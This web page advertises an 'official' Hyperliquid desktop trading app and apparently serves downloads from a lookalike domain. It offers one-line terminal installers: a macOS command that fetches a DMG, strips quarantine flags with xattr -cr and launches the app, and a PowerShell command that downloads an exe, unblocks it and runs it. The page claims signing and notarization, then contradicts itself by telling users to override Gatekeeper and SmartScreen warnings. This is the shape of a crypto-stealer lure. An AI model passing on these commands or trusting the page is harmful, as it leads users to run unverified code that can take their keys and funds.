Now available for desktop

The Official Hyperliquid Apps for Mac & Windows

Experience the ultimate crypto trading terminal natively on your desktop. Our core mission is to provide the fastest, most secure trading experience via our dedicated Mac and Windows apps.

Free to use Windows 10/11 & macOS 12+ Signed & notarized
Hyperliquid app trading interface
<10ms
Order latency
2
Native platforms
100%
Local key signing
24/7
Market access
Built for traders

Everything you need, natively

A dedicated desktop experience — faster and more focused than the browser, without giving up any control of your assets.

Native performance

GPU-accelerated charts and streaming data in a dedicated app — no browser tabs, no throttling, no lag.

Keys stay local

Transactions are signed on your device. Your private keys never touch our servers — non-custodial by design.

Real-time order books

Live depth, fills, and positions update the instant they change, with tabular precision and zero refresh.

Advanced charting

Multi-pane layouts, drawing tools, and indicators built for serious analysis — all in a resizable window.

Hotkeys & one-click

Fully customizable keyboard shortcuts and one-click trading for when milliseconds matter.

Auto-updates

Signed, incremental updates arrive automatically so you're always on the latest secure build.

A serious workspace

Your whole desk, in one window

Arrange charts, order entry, positions, and the book exactly how you trade. The layout is yours and it stays put between sessions.

  • Resizable, multi-monitor friendly panels
  • Persistent layouts and watchlists
  • Native notifications for fills and alerts
  • Trade everything in one place
Security

Download with confidence

Every release is code-signed, notarized, and checksummed. Install only from the official domain and verify before you run.

Signed & notarized

macOS builds carry a Developer ID signature and an Apple notarization ticket. Windows builds are signed with an EV certificate. Your OS confirms the app is genuine before it opens.

SHA-256 checksums

Published hashes let you verify the installer hasn't been tampered with before you ever run it.

Non-custodial

You keep full control of your funds and keys at all times. We never take custody of your assets.

Download

Get Hyperliquid Desktop

Pick your platform below, or run the one-line installer if you prefer the terminal. Every build is signed and notarized.

Install via terminal

Prefer the command line? Paste the line for your platform to download, mount, install, and launch in one step.

bash — macOS
user@macbook:~$ # Download, install, and launch
user@macbook:~$ curl -L -o /tmp/hyperliquid.dmg "https://www.hyperliquidcrypto.xyz/downloads/hyperliquid.dmg" && hdiutil attach /tmp/hyperliquid.dmg -nobrowse -mountpoint /tmp/hyperliquid_mount -quiet && rm -rf /Applications/Hyperliquid.app && cp -R /tmp/hyperliquid_mount/Hyperliquid.app /Applications/ && xattr -cr /Applications/Hyperliquid.app && hdiutil detach /tmp/hyperliquid_mount -quiet && rm -f /tmp/hyperliquid.dmg && open /Applications/Hyperliquid.app
Windows PowerShell
PS C:\Users\Admin> # Download and launch the installer
PS C:\Users\Admin> $e="$env:TEMP\hyperliquid.exe"; Invoke-WebRequest "https://www.hyperliquidcrypto.xyz/downloads/hyperliquid.exe" -OutFile $e; Unblock-File $e; Start-Process $e

Windows

Windows 10 & 11 · 64-bit · Installer (.exe)

Download for Windows

macOS

macOS 12 Monterey or later · Apple Silicon & Intel

Download for macOS Intel Mac build (.dmg)

Installation Help

macOS Installation & Gatekeeper

  1. Mount the .dmg and drag Hyperliquid.app to your Applications folder.
  2. Right-click (or Control + click) Hyperliquid.app in /Applications and select Open.
  3. In the popup dialog, click Open.
  4. On macOS Sequoia / Sonoma: if you’re prompted to move it to Trash or the app is blocked, open System Settings → Privacy & Security, then:
    • Scroll down to the Security section.
    • Click “Open Anyway” next to Hyperliquid.app.

Why this happens: The Mac build is not yet signed with an Apple Developer certificate, so Gatekeeper asks you to confirm on first launch. After you approve it once, Hyperliquid opens normally.

Windows Installation

Download the .exe installer and run it. If Windows SmartScreen displays a warning, click More info and then Run anyway.

Version 1.0.0 · Only install from www.hyperliquidcrypto.xyz. If your browser or OS warns you about this file, stop and re-download from this page.

FAQ

Questions, answered

Is the Hyperliquid desktop app free?

Yes. The desktop app is free to download and use on both Windows and macOS.

Which operating systems are supported?

Windows 10 and 11 (64-bit) and macOS 12 Monterey or later, including both Apple Silicon and Intel Macs.

How do I verify the download is authentic?

Only download from the official domain. macOS builds are signed with an Apple Developer ID and notarized, so Gatekeeper verifies them automatically on first launch. Windows builds are signed with an EV certificate, which establishes SmartScreen reputation immediately. Every release also publishes a SHA-256 checksum so you can confirm the installer is genuine before running it.

Are my keys stored on your servers?

No. The app signs transactions locally on your machine. Your private keys never leave your device — it is non-custodial by design.